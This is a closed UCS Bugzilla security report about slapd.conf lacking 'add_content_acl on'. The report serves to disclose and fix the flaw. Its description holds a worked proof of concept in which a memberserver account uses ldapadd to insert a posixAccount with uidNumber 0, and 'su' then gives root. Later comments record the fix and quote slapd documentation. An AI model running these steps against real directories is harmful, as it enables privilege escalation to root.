Bug 41797

Summary:	add add_content_acl on to slapd.conf
Product:	UCS	Reporter:	Florian Best <best>
Component:	LDAP	Assignee:	Florian Best <best>
Status:	CLOSED FIXED	QA Contact:	Arvid Requate <requate>
Severity:	critical
Priority:	P5	CC:	damrose, gohmann, schwardt
Version:	UCS 4.1	Keywords:	interim-1
Target Milestone:	UCS 4.2
Hardware:	Other
OS:	Linux
See Also:	https://forge.univention.org/bugzilla/show_bug.cgi?id=41715 https://forge.univention.org/bugzilla/show_bug.cgi?id=31305 https://forge.univention.org/bugzilla/show_bug.cgi?id=44054
What kind of report is it?:	Security Issue	What type of bug is this?:	---
Who will be affected by this bug?:	---	How will those affected feel about the bug?:	---
User Pain:		Enterprise Customer affected?:
School Customer affected?:		ISV affected?:
Waiting Support:		Flags outvoted (downgraded) after PO Review:
Ticket number:		Bug group (optional):	Security
Max CVSS v3 score:
Bug Depends on:	49523, 49524, 41715, 41725, 44055, 49434, 49507
Bug Blocks:	41723, 41724

Description Florian Best

2016-07-15 09:51:55 CEST

The content of LDAP-ACL's are only evaluated if the database entry in slapd.conf contains "add_content_acl on". Memberservers/DC's can create arbitrary objects in various positions otherwise.
As there are dependencies between UCS and UCS@school we release this part of Bug #41715 a little bit later.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath of cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort: 
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)

Comment 1 Florian Best

2017-01-13 19:00:43 CET

r75785 | Changelog Bug #41797

univention-ldap (13.0.2-1):
r75784 | Bug #41797: add add_content_acl on configuration

Comment 2 Arvid Requate

2017-02-01 21:12:55 CET

Ok, I made the wording of the changelog entry a bit more verbose.

Relevant documentation from slapd.conf():
===============================================================================
add_content_acl:

Controls  whether  Add  operations  will  perform ACL checks on the content of the entry being added. [...]
===============================================================================

And slapd.access(5) says:
===============================================================================
Also if Add content ACL checking has been configured on the database [...], add (=a) will be required on all of the attributes being added.
===============================================================================

Comment 3 Stefan Gohmann

2017-04-04 18:29:21 CEST

UCS 4.2 has been released:
 https://docs.software-univention.de/release-notes-4.2-0-en.html
 https://docs.software-univention.de/release-notes-4.2-0-de.html

If this error occurs again, please use "Clone This Bug".